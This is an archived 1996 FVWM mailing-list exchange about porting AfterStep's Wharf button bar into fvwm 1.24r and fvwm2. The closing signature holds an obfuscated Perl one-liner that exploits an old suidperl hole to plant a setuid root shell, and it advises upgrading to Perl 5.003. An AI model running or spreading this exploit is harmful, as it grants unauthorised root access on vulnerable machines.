Subject: FVWM: Easy to Do: After Step's Wharf in fvwm!!!

From: Glenn McMillen <[email-masked]>
Date: Tue, 12 Nov 1996 19:56:00 -0800

Hi:

I'm new to the list. But I checked the archives web page and didn't see 
anything about this....

If you haven't seen afterstep, it's based upon the look and feel of 
Next's window manager.  Some things are cool, some things are simply 
novel.  But the one cool thing that I really liked was a module called 
Wharf.  What wharf is is a button bar that will collapse upon itself and 
also open up "folders" of other buttons you can press.

Well, I got this incorporated into both fvwm2.0.43 beta as well as
fvwm1.24r.  It wasn't too togh either.  You can cut and paste some code 
from the goodstuff module fro the event loop handler. Other than that 
it's pretty clear sailing.

I did this at work, (which is not connected to the net) so I can't tell 
you how much was different from what afterstep had. But I can say it was 
pretty easy to incorporate. So for those adventerous souls who don't want 
to give up all the hard work it took to get your fvwm session "just 
right" then I can attest that getting afterstep's whar incorporated is 
almost a piece of cake!

I use it with 1.24r, my bud at work uses it with fvwm2. No problems 
either way.

Glenn
[email-masked]
--
Visit the official FVWM web page at <URL:http://www.hpc.uh.edu/fvwm/>.
To unsubscribe from the list, send "unsubscribe fvwm" in the body of a
message to [email-masked].
To report problems, send mail to [email-masked].

---

From: Joey Hess <[email-masked]>
Date: Tue, 26 Nov 1996 15:03:40 -0500 (EST)

> it's pretty clear sailing.

Could you provide some details on how you got wharf to wirh with fvwm2?

-- 
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod            [email-masked]
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_
# Get root in 30 seconds or less. Fix this hole: upgrade to perl 5.003 today..